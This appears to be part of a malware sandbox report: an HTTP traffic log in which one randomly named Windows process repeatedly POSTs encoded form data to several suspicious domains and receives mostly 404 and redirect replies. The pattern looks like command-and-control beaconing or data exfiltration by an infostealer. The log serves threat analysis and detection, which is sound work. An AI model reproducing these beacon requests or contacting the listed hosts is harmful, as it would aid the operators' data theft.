                                                                                          Jan 8, 2025 15:01:06.408685923 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:01:06 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          19 | 192.168.2.6 | 49995 | 194.58.112.174 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:08.319483042 CET | 1824 | OUT | POST /9bhq/ HTTP/1.1
                                                                                          Host: www.mosorehlable.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.mosorehlable.online
                                                                                          Referer: http://www.mosorehlable.online/9bhq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:09.002496958 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:01:08 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Content-Encoding: gzip


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          20 | 192.168.2.6 | 49996 | 194.58.112.174 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:11.005486965 CET | 520 | OUT | GET /9bhq/?T4OdNH=E1KWPzuDUrXzeIr+MheblCNEP6GOTx17RfcrRTPFJ37rektGz/Z4QpsAgIJ1fke2ZLjhPbUfcs2Q2jBDnmdO4FnF2DWbeyRHVN+LoHOctdylDUorIjBcKbLwehehFJbE7gRrWpM=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.mosorehlable.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:11.570923090 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Wed, 08 Jan 2025 14:01:11 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          21 | 192.168.2.6 | 49997 | 199.192.21.169 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:16.627850056 CET | 760 | OUT | POST /stho/ HTTP/1.1
                                                                                          Host: www.solidf.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.solidf.xyz
                                                                                          Referer: http://www.solidf.xyz/stho/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:17.210994959 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:17 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 774
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          22 | 192.168.2.6 | 49998 | 199.192.21.169 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:19.175307989 CET | 784 | OUT | POST /stho/ HTTP/1.1
                                                                                          Host: www.solidf.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.solidf.xyz
                                                                                          Referer: http://www.solidf.xyz/stho/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=rklZkDUpzyyD42fNs3nTjcgBQOpMXoNzrPTP7xA7876Hyj7N47vHQy+3dlR8bH3p2g+NYs1AJrXIrrWsKFcz9lXkF0ZmQGvniaGowXMjlURTApA/VZYJ3b9dcop9Goz/qessRUdy+ohqgGB6NrWuP7SP1iJI9fekvFheHa6m6IQBn2MgX9LwYIUryjMAnXxMNYmcvi1/MJ599Q1P/Ik3eSsqvSb17xl3+w==
                                                                                          Jan 8, 2025 15:01:19.775543928 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:19 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 774
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          23 | 192.168.2.6 | 49999 | 199.192.21.169 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:21.718378067 CET | 1797 | OUT | POST /stho/ HTTP/1.1
                                                                                          Host: www.solidf.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.solidf.xyz
                                                                                          Referer: http://www.solidf.xyz/stho/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:23.190547943 CET | 918 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:22 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 774
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          24 | 192.168.2.6 | 50000 | 199.192.21.169 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:24.259267092 CET | 511 | OUT | GET /stho/?T4OdNH=mmN5n3cJgwCS/hPSyyDLsNIVXPMNWoUq1Zr31hV11eqK/h/PlpONTBiAVWsNASboghm0fbZ0NPzr87fjFnRbzCyOI219SS/ig8yR+3V4slRmOpkmcKIusrBtdNsAS/Tkjrlhc08=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.solidf.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:24.874818087 CET | 933 | IN | HTTP/1.1 404 Not Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:24 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 774
                                                                                          Connection: close
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          25 | 192.168.2.6 | 50001 | 192.64.119.109 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:29.931911945 CET | 760 | OUT | POST /5mxq/ HTTP/1.1
                                                                                          Host: www.laduta.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.laduta.xyz
                                                                                          Referer: http://www.laduta.xyz/5mxq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=vMVYSiVsBjs+ZwmBc03SEEJttsaXndujqFc7tIZAmaTlU+E3MN4jJH4TWM5u2S6pAGAs1v/KXVyjDIo1beA+8mrzDKrqdw+NkVEvYMq0Oo+NNR4HS71kUX2Hur0ECMvQsdAP7907GP0Zo4FLpMu5TOtB2PPbKNcByFVv5NBCwVwn7FGaEu562HuJvYO0EnRVmFoPFHr8CqL+
                                                                                          Jan 8, 2025 15:01:30.427824974 CET | 193 | IN | HTTP/1.1 302 Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:30 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Location: https://laduta.xyz/5mxq
                                                                                          X-Served-By: Namecheap URL Forward
                                                                                          Server: namecheap-nginx


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          26 | 192.168.2.6 | 50002 | 192.64.119.109 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:32.485991001 CET | 784 | OUT | POST /5mxq/ HTTP/1.1
                                                                                          Host: www.laduta.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.laduta.xyz
                                                                                          Referer: http://www.laduta.xyz/5mxq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=vMVYSiVsBjs+LDuBZTrSBkJihMaXu9unqFY7tJsFmo3lNeU3NIEjEn4TCc5vyS7lAGNT1uTKXVOjDI41bu8/92rxPqrsTQ+NkVEvYM+eOomNNF8HTZNnXX2E+b0EJsvUsdA574URGNcZo41LpZO4K+tH4vOZOYB2ykc8/+tzgF0n6zbAYd5ZkXOLvaWGEHR/kFQPXQnbNeudHG1pPT3CqqqzHqYn709YRw==
                                                                                          Jan 8, 2025 15:01:32.966286898 CET | 193 | IN | HTTP/1.1 302 Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:32 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Location: https://laduta.xyz/5mxq
                                                                                          X-Served-By: Namecheap URL Forward
                                                                                          Server: namecheap-nginx


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          27 | 192.168.2.6 | 50003 | 192.64.119.109 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:35.033380032 CET | 1797 | OUT | POST /5mxq/ HTTP/1.1
                                                                                          Host: www.laduta.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.laduta.xyz
                                                                                          Referer: http://www.laduta.xyz/5mxq/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:35.619435072 CET | 193 | IN | HTTP/1.1 302 Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:35 GMT
                                                                                          Content-Length: 0
                                                                                          Connection: close
                                                                                          Location: https://laduta.xyz/5mxq
                                                                                          X-Served-By: Namecheap URL Forward
                                                                                          Server: namecheap-nginx


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          28 | 192.168.2.6 | 50004 | 192.64.119.109 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:37.583431005 CET | 511 | OUT | GET /5mxq/?T4OdNH=iO94RS5UfBQ5HC+BbRXYGHpdoey0nMmihjIqhakPtq2eYvg9AqcPAmRUPZBNji7wd38qvvn/XQ+Vfr9uTuQ/zSitIKONVg6W4BJ6U8+dApebSQkrfqhDfnKkuLJ5c8X1k/dz1dA=&r4=tP5HWLt8wXstw4H HTTP/1.1
                                                                                          Host: www.laduta.xyz
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:38.065567970 CET | 623 | IN | HTTP/1.1 302 Found
                                                                                          Date: Wed, 08 Jan 2025 14:01:38 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 217
                                                                                          Connection: close
                                                                                          Location: https://laduta.xyz/5mxq?T4OdNH=iO94RS5UfBQ5HC+BbRXYGHpdoey0nMmihjIqhakPtq2eYvg9AqcPAmRUPZBNji7wd38qvvn%2FXQ+Vfr9uTuQ%2FzSitIKONVg6W4BJ6U8+dApebSQkrfqhDfnKkuLJ5c8X1k%2Fdz1dA%3D&r4=tP5HWLt8wXstw4H
                                                                                          X-Served-By: Namecheap URL Forward
                                                                                          Server: namecheap-nginx
                                                                                          Data Ascii: <a href='https://laduta.xyz/5mxq?T4OdNH=iO94RS5UfBQ5HC+BbRXYGHpdoey0nMmihjIqhakPtq2eYvg9AqcPAmRUPZBNji7wd38qvvn%2FXQ+Vfr9uTuQ%2FzSitIKONVg6W4BJ6U8+dApebSQkrfqhDfnKkuLJ5c8X1k%2Fdz1dA%3D&r4=tP5HWLt8wXstw4H'>Found</a>.


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          29 | 192.168.2.6 | 50005 | 13.248.169.48 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:43.120274067 CET | 790 | OUT | POST /13to/ HTTP/1.1
                                                                                          Host: www.londonatnight.coffee
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.londonatnight.coffee
                                                                                          Referer: http://www.londonatnight.coffee/13to/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=+0sAr6US8gQ58j9F8mXf9EhLW6LOm+Fq+6l4hwD/4ycKXrb3Ht3vjhnSsRICIClgjGxnDhnkkNlQfdKAgL5L3hmWpPHEdff29MaoTGgH9dIc41r8f46L79PseR0PtSFctwQJF8AtHwkAAnwtQxHvhJEyE7RNJtitwwQkcQiure1sQ+8M+wNBox98gHigL4hQ6lOGedt5cB5h
                                                                                          Jan 8, 2025 15:01:43.592567921 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                          content-length: 0
                                                                                          connection: close


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          30 | 192.168.2.6 | 50006 | 13.248.169.48 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:45.674020052 CET | 814 | OUT | POST /13to/ HTTP/1.1
                                                                                          Host: www.londonatnight.coffee
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.londonatnight.coffee
                                                                                          Referer: http://www.londonatnight.coffee/13to/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 235
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=+0sAr6US8gQ56DtFs1/fpUhEZaLOveFU+6h4hzPV4GwKWOn3Es3vuBnSnxJpVSlRjG8NDgrkkNxQffSAj4RU0RmUyfHaQ/f29MaoTG099dAc5GD8eaSMntPjUx0PmyFYtwQvF9d6H1gAAlotQgHuv5EwbrQOJsPd4D5gfAu968QPcohWiDNi6hd+gF6SLYh64l2GMKheT1cCtIQVpQnNtYIHgBpW5Ejs6g==


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          31 | 192.168.2.6 | 50007 | 13.248.169.48 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:48.229684114 CET | 1827 | OUT | POST /13to/ HTTP/1.1
                                                                                          Host: www.londonatnight.coffee
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.londonatnight.coffee
                                                                                          Referer: http://www.londonatnight.coffee/13to/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 1247
                                                                                          Connection: close
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Data Ascii: T4OdNH=+0sAr6US8gQ56DtFs1/fpUhEZaLOveFU+6h4hzPV4HkKW4z3eLLvvBnSuRIOVSl2jGkJDg3SkOJQe8aAiNtUvBmU7/HHdfe09MKzTGk99dAc5A/8K46M3dPseR1btSF8twJUF9YHbWYADF4tDDvuppE+arQsJsDC4CVGfBqX6/MPedU01C01ghNiwVulEohE42K/Lr5edElsrtlJpi2qv41r/3YdwHy3nJSnI0Qx9dKgtceeI1i7JUZwvtS7azdGbl/Ub0zgxfzwrG6eJI67pcz0pGQ7QzGc9pZ8rHSxXYvKqzONYJSeZARs6RQ2XKQLcVtvZhbBy5C382ZRgoJjczsdOytu/qiX1BWGyMVyBulFRK8x/Sem0DsTJx9j7Xu7Tzcb6CmY4yg4ydqkogqBIuYUSgyZxR1CyCaLKwf4BNJkGrob5uTmA+2Ys45EFjULyfbhL8JY0XIuehqlwdMBfqcIf4y2im08p/3GGVi905FcSNsthlDKns15cY3WqhQnWM5YQYcv1ONwVAYSvVD3qCA0CIyvhqVMAPsllaUWCtvbi+ueajXf5dvOl8y318+mu1As5BMl9v+V7e0xTf15KCSGsG/Z8F4wpGWxEcxc9chCjqVd+i8/uOa20ilyUojgZY1mME1PP9RWKI4wwriQnI6r749nvNf+CjLLuc5m7KZ9VzTw8Mk64TAg2Rmm9SVbinK6JI1hOHOmW8ysTuucZILuLPUc84+XawN5E0YVu961P5725UP5B0HGBBl8JhPpsdiy78Jzvvkwb6GekvR0txLj7cmdxpO0l25rX5NiQaFfPgkrecoX9LOEdhokEuvzm2006UWTogvqPLmzHnLmDa9PGWa34zeClcMvgk02n55vMctvzS2XYfUy5iTQnkLZzLTsJ/SF42gmMvO9WMA0W0Hk9rTNAjX0/Y4M001pkXtRA9eOa2iQ4W/wmO8znQvcEzb9ASqeidQvd6YVVudKcHPj+Qq0eCNy6wzD42jbTChwy [TRUNCATED]


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          32 | 192.168.2.6 | 50008 | 13.248.169.48 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:50.774625063 CET | 521 | OUT | GET /13to/?r4=tP5HWLt8wXstw4H&T4OdNH=z2EgoPQiqWsx10s8imXn9EhLUqHIpfNm2M9hnivL2yIwQ5T5ZMz+m2ngmAV/UVpa818CagjxjfYFH/Xhgr0dlnT3xa+eVvaI/ZjmdVMj8eQS2FfncZyG6J/yATIX4FRolS5bDYc= HTTP/1.1
                                                                                          Host: www.londonatnight.coffee
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Connection: close
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4049.US Safari/537.36
                                                                                          Jan 8, 2025 15:01:52.254452944 CET | 398 | IN | HTTP/1.1 200 OK
                                                                                          content-type: text/html
                                                                                          date: Wed, 08 Jan 2025 14:01:52 GMT
                                                                                          content-length: 277
                                                                                          connection: close
                                                                                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?r4=tP5HWLt8wXstw4H&T4OdNH=z2EgoPQiqWsx10s8imXn9EhLUqHIpfNm2M9hnivL2yIwQ5T5ZMz+m2ngmAV/UVpa818CagjxjfYFH/Xhgr0dlnT3xa+eVvaI/ZjmdVMj8eQS2FfncZyG6J/yATIX4FRolS5bDYc="}</script></head></html>


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          33 | 192.168.2.6 | 50009 | 103.247.11.204 | 80 | 2300 | C:\Program Files (x86)\qzokgalzCmlKHRQwalDXwVuUvDldHOnJIsstuUoNauymMyPuekXTZKLpXbJDnXzBumVOQcJwgmwqnEx\oDhSPGbJgMIIvl.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 8, 2025 15:01:59.219496965 CET | 766 | OUT | POST /vw2j/ HTTP/1.1
                                                                                          Host: www.itcomp.store
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                          Origin: http://www.itcomp.store
                                                                                          Referer: http://www.itcomp.store/vw2j/
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 211
